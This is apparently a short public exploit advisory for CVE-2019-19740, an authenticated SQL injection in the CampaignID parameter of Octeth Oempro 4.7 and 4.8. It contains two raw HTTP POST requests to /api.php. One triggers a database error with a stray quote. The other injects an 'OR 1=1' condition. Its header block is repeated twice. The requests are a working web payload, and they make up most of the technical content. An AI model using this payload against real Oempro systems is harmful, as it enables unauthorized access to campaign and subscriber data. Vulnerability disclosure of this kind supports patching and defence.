# Exploit Title: Octeth Oempro 4.8 - 'CampaignID' SQL
Injection
# Date: 2020-01-27
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740
# Date: 2020-01-27
# Exploit Author: Bruno de Barros Bulle (www.xlabs.com.br)
# Vendor Homepage: www2.octeth.com
# Version: Octeth Oempro v.4.7 and v.4.8
# Tested on: Oempro v.4.7
# CVE : CVE-2019-19740
An authenticated user can easily exploit this vulnerability.
Octeth Oempro
4.7 and 4.8 allow SQL injection. The parameter CampaignID in
Campaign.Get
is vulnerable.
# Error condition
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019'&responseformat=JSON
# SQL Injection exploitation
POST /api.php HTTP/1.1
Host: 127.0.0.1
command=Campaign.Get&CampaignID=2019 OR
'1=1&responseformat=JSON
